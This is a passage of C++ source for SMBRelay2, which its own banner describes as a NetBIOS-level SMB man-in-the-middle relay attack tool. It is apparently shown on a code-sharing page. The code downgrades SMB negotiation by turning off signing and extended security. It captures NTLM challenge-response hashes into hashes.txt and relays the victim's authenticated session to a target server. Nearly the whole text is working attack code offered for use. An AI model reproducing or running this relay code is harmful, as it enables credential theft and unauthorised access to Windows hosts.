📄 smbrelay2.cpp
字号:
pTreeConnectAnd2->PasswordLen = 1;
pTreeConnectAnd2->ByteCount = 32;
char *ptr = (char *)(pTreeConnectAnd2 + 1);
*ptr = 0;
ptr++;
WCHAR *wptr = (WCHAR *)ptr;
swprintf(wptr, L"\\\\%S\\IPC$", hostname);
pTreeConnectAnd2->ByteCount = (wcslen(wptr) + 1) * 2;
wptr += wcslen(wptr) + 1;
ptr = (char *)wptr;
strcpy(ptr, "?????");
pTreeConnectAnd2->ByteCount += 7;
inncb.ncb_length = sizeof(SMBHEADER) + psessionsetupand2->Len * 2 + psessionsetupand2->ByteCount + 2 + pTreeConnectAnd2->Len * 2 + pTreeConnectAnd2->ByteCount + 4 ;
}
break;
case SESSION_SETUP_ANDHEADER2EX_LEN: // Win2000
fprintf(stderr, "Security blob len: %d\n", psessionsetupand2ex->SecurityBlobLen);
break;
default:
fprintf(stderr, "Unknown setup header length %d\n", psessionsetupand->Len);
break;
}
break;
}
}
if (g_DebugLevel > 2)
fprintf(stderr, "Sending query to target server\n");
NBSend(&outncb, buff, inncb.ncb_length);
if (g_DebugLevel > 2)
fprintf(stderr, "Receiving response from target server\n");
if (!NBRecv(&outncb, (PUCHAR)buff, sizeof(buff)))
{
NBHangup(&inncb);
return ;
}
switch (psmbheader->Command)
{
case SMB_COM_NEGOTIATE:
SessionID = pdialectselectheader->UniqueSessionKey;
if (pdialectselectheader->EncryptionKeyLen )
{
fprintf(stderr, "Challenge (%d bytes): ", pdialectselectheader->EncryptionKeyLen);
PrintHexString((BYTE *)(pdialectselectheader + 1), pdialectselectheader->EncryptionKeyLen);
memcpy(challenge, pdialectselectheader + 1, 8);
fprintf(stderr, "\n");
}
if (pdialectselectheader->bSecuritySignaturesRequired )
{
fprintf(stderr, "Security signatures required by server *** THIS MAY NOT WORK!\n");
pdialectselectheader->bSecuritySignaturesRequired = 0;
}
if (pdialectselectheader->bExtendedSecurity)
{
fprintf(stderr, "Disabling extended security *** THIS MAY NOT WORK!\n");
pdialectselectheader->bExtendedSecurity = 0;
}
if (pdialectselectheader->bSecuritySignaturesEnabled)
{
fprintf(stderr, "Disabling security signatures\n");
pdialectselectheader->bSecuritySignaturesEnabled = 0;
}
// copy negotiation response for relaying later
memcpy(negotiateheaders, buff, sizeof(negotiateheaders));
break;
case SMB_COM_SESSION_SETUP_ANDX:
if (psmbheader->NTError == 0)
{
if (strlen(username))
bConnected = TRUE;
if (psessionsetupandresponse->Action & 1)
{
fprintf(stderr, "Connected as guest\n");
}
if (/* psmbheader->bUnicodeStrings*/TRUE )
{
WCHAR *ptr = (WCHAR *)(psessionsetupandresponse + 1);
if ((DWORD)ptr % 2)
ptr = (WCHAR *)((char *)ptr +1);
fprintf(stderr, "OS: \"%S\"\n", ptr);
ptr += wcslen(ptr) + 1;
fprintf(stderr, "Lanman type: \"%S\"\n", ptr);
ptr += wcslen(ptr) + 1;
fprintf(stderr, "Domain: \"%S\"\n", ptr);
}
else
{
char *ptr = (char *)(psessionsetupandresponse + 1);
fprintf(stderr, "OS: \"%s\"\n", ptr);
ptr += strlen(ptr) + 1;
fprintf(stderr, "Lanman type: \"%s\"\n", ptr);
ptr += strlen(ptr) + 1;
fprintf(stderr, "Domain: \"%s\"\n", ptr);
ptr += strlen(ptr) + 1;
}
if (strlen(username))
{
memcpy(logonandconnectheaders, buff, sizeof(logonandconnectheaders));
UID = psmbheader->UserID;
}
}
else
{
fprintf(stderr, "Login failure code: 0x%08X\n", psmbheader->NTError );
}
break;
}
if (!bConnected)
{
if (g_DebugLevel > 2)
fprintf(stderr, "Sending response to target client");
NBSend(&inncb, buff, outncb.ncb_length);
}
fprintf(stderr, "\n");
}
NBHangup(&inncb);
FILE *file;
file = fopen("hashes.txt", "a");
if (file != NULL)
{
fprintf(file, "%s\\%s:3:", hostname, username);
for (x = 0; x < 8; x++)
fprintf(file, "%02X", challenge[x]);
fprintf(file, ":");
for (x = 0; x < 24; x++)
fprintf(file, "%02X", caseinsensitivepassword[x]);
fprintf(file, ":");
for (x = 0; x < 24; x++)
fprintf(file, "%02X", casesensitivepassword[x]);
fprintf(file, "\n");
fclose(file);
fprintf(stderr, "Password hash written to disk\n");
}
if (bConnected)
{
fprintf(stderr, "Connected?\n");
if (!NBAddName(RelayName, &inncb) )
{
NBHangup(&outncb);
fprintf(stderr, "Unable to add relay name\n");
return ;
}
while (bConnected && !g_bQuit)
{
if (!NBListen(&inncb))
{
fprintf(stderr, "Error receiving relay connetion\n");
NBHangup(&outncb);
return ;
}
fprintf(stderr, "*** Relay connection for target %s received from ", hostname);
PrintNetBIOSName(inncb.ncb_callname);
fprintf(stderr, "\n");
bContinue = TRUE;
BOOL bLogonDone = FALSE;
BOOL bDialectSelected = FALSE;
do
{
BOOL bDoSend = TRUE;
// if (g_DebugLevel > 2)
// fprintf(stderr, "Receiving request from relay\n");
if (!NBRecv(&inncb, (PUCHAR)buff, sizeof(buff)))
{
bContinue = FALSE;
}
if (inncb.ncb_length == 0)
bDoSend = FALSE;
if (bContinue && bDoSend)
{
if (psmbheader->MagicVal != SMBMAGICVAL )
{
if (g_DebugLevel > 0)
fprintf(stderr, "Non SMB message, magicval: %08x length %d bytes target %s\n", psmbheader->MagicVal, inncb.ncb_length, hostname);
}
else
{
if (g_DebugLevel > 0)
fprintf(stderr, "%s\n", GetCommandType(psmbheader->Command));
}
switch (psmbheader->Command)
{
case SMB_COM_LOGOFF_ANDX:
fprintf(stderr, " *** Logoff from target %s\n", hostname);
bDoSend = FALSE;
bContinue = FALSE;
break;
case SMB_COM_NEGOTIATE:
if (!bDialectSelected)
{
char *ptr = (char *)(psmbheader + 1) + 3;
int selecteddialect = 0;
x = 0;
bDialectSelected = TRUE;
while (selecteddialect == 0 && ptr < buff + inncb.ncb_length)
{
if (g_DebugLevel > 0)
fprintf(stderr, "%d - Dialect %d - %s\n", x, *ptr, ptr+1);
x++;
ptr += strlen(ptr+1) + 2;
// locate dialect of choice
if (strcmp(ptr+1, LANMANDIALECT_NTLM012) == 0)
selecteddialect = x;
}
memcpy(buff, negotiateheaders, sizeof(negotiateheaders));
pdialectselectheader->Len = SMBDIALECTSELECTHEADER_LEN;
pdialectselectheader->DialectIndex = selecteddialect;
ptr = (char *)(pdialectselectheader + 1);
// put encryption key here
memcpy(ptr, "!!!!!!!!", 8);
ptr += SMBENCRYPTIONKEYLEN ;
if (/*psmbheader->bUnicodeStrings*/TRUE)
{
swprintf((WCHAR *)ptr, L"%S", SERVERDOMAINNAME);
pdialectselectheader->ByteCount = SMBENCRYPTIONKEYLEN + (strlen(SERVERDOMAINNAME) + 1) * 2;
}
else
{
strcpy(ptr, SERVERDOMAINNAME);
pdialectselectheader->ByteCount = SMBENCRYPTIONKEYLEN + strlen(SERVERDOMAINNAME) + 1;
}
inncb.ncb_length = sizeof(SMBHEADER) + sizeof(SMBDIALECTSELECTHEADER) + pdialectselectheader->ByteCount ;
fprintf(stderr, " *** Sent dialect selection response (%d) for target %s\n", selecteddialect, hostname );
NBSend(&inncb, buff, inncb.ncb_length);
bDoSend = FALSE;
}
break;
case SMB_COM_SESSION_SETUP_ANDX:
if ( !bLogonDone )
{
bLogonDone = TRUE;
WORD MID = psmbheader->MultiplexID;
WORD AndXCommand = psessionsetupand->AndXCommand ;
memcpy(buff, logonandconnectheaders, sizeof(logonandconnectheaders) );
psmbheader->MultiplexID = MID;
psmbheader->UserID = UID ;
outncb.ncb_length = sizeof(SMBHEADER) + psessionsetupandresponse->Len * 2 + psessionsetupandresponse->ByteCount + 2;
// truncate it if necessary
if (AndXCommand == SMB_NONE)
{
psessionsetupandresponse->AndXCommand = SMB_NONE;
psessionsetupandresponse->AndXOffset = 0;
}
else
{
PTREE_CONNECT_ANDRESPONSEHEADER ptreeconnectand = (PTREE_CONNECT_ANDRESPONSEHEADER)( (char *)psmbheader + psessionsetupandresponse->AndXOffset );
ptreeconnectand->Len = TREE_CONNECT_ANDRESPONSEHEADER_LEN;
ptreeconnectand->AndXCommand = SMB_NONE;
ptreeconnectand->AndXOffset = 0;
ptreeconnectand->AndXReserved = 0;
ptreeconnectand->OptionalSupport = 0;
char *ptr = (char *)(ptreeconnectand + 1);
strcpy(ptr, "IPC");
ptreeconnectand->ByteCount = strlen(ptr) + 3;
ptr += strlen(ptr) + 1;
*ptr = 0;
ptr++;
*ptr = 0;
outncb.ncb_length += ptreeconnectand->Len * 2 + ptreeconnectand->ByteCount + 4;
}
fprintf(stderr, " *** Sent SMB Session setup response for relay to %s\n", hostname);
NBSend(&inncb, buff, inncb.ncb_length);
bDoSend = FALSE;
}
break;
}
}
if (bContinue && bDoSend )
{
if (g_DebugLevel > 2)
fprintf(stderr, "Sending request to target server\n");
NBSend(&outncb, buff, inncb.ncb_length);
}
if (bContinue && !g_bQuit)
{
if (!NBRecv(&outncb, (PUCHAR)buff, sizeof(buff)))
{
fprintf(stderr, "Error receiving response from target");
bContinue = FALSE;
}
if (bContinue && !g_bQuit && outncb.ncb_length > 0)
{
if (g_DebugLevel > 0)
fprintf(stderr, "Received %d byte response from target %s\n", outncb.ncb_length , hostname);
if (g_DebugLevel > 2)
fprintf(stderr, "Sending response to relay client\n");
NBSend(&inncb, buff, outncb.ncb_length);
}
}
Sleep(5);
} while (bContinue && !g_bQuit);
fprintf(stderr, " *** Relay disconnected from target %s\n", hostname);
}
}
NBHangup(&inncb);
NBHangup(&outncb);
}
int main(int argc, char* argv[])
{
NCB inncb;
int MaxSessions = 20;
int MaxNames = 32;
char LocalName[32] = "SERVER ";
int x;
fprintf(stderr, "SMBRelay2 v.98 - NetBIOS level SMB man-in-the-middle relay attack\n");
for (x = 1; x < argc; x++)
{
if (argv[x][0] == '/')
{
switch (toupper(argv[x][1]))
{
case 'A':
if (x > argc - 2)
{
fprintf(stdout, "Missing argument for %s\n", argv[x]);
Usage();
return 0;
}
x++;
g_LanaNum = atoi(argv[x]);
break;
case 'D':
if (x > argc - 2)
{
fprintf(stdout, "Missing argument for %s\n", argv[x]);
Usage();
return 0;
}
x++;
g_DebugLevel = atoi(argv[x]);
break;
case 'L':
if (x > argc - 2)
{
fprintf(stdout, "Missing argument for %s\n", argv[x]);
Usage();
return 0;
}
x++;
ParamToNetBIOSName(LocalName, argv[x]);
LocalName[NCBNAMSZ-1] = 0x20;
break;
case 'R':
if (x > argc - 2)
{
fprintf(stdout, "Missing argument for %s\n", argv[x]);
Usage();
return 0;
}
x++;
ParamToNetBIOSName(RelayName, argv[x]);
RelayName[NCBNAMSZ-1] = 0x20;
break;
case 'S':
if (x > argc - 2)
{
fprintf(stdout, "Missing argument for %s\n", argv[x]);
Usage();
return 0;
}
x++;
ParamToNetBIOSName(SourceName, argv[x]);
break;
case 'T':
if (x > argc - 2)
{
fprintf(stdout, "Missing argument for %s\n", argv[x]);
Usage();
return 0;
}
x++;
ParamToNetBIOSName(TargetName, argv[x]);
TargetName[NCBNAMSZ-1] = 0x20;
break;
default:
fprintf(stdout, "Bad option: \"%s\"\n", argv[x] );
case '?':
case 'H':
Usage();
return 0;
break;
}
}
else
{
fprintf(stderr, "Bad argument: %s\n", argv[x]);
}
}
if (!NBReset (g_LanaNum, MaxSessions, MaxNames))
return 0;
if (!NBAddName(LocalName, &inncb) )
{
return 0;
}
do
{
if (!NBListen(&inncb))
{
fprintf(stderr, "Error listening\n");
return 0;
}
_beginthread( ConnectionHandlerThread, 0, &inncb );
Sleep(150);
} while (TRUE);
_getch();
return 0;
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -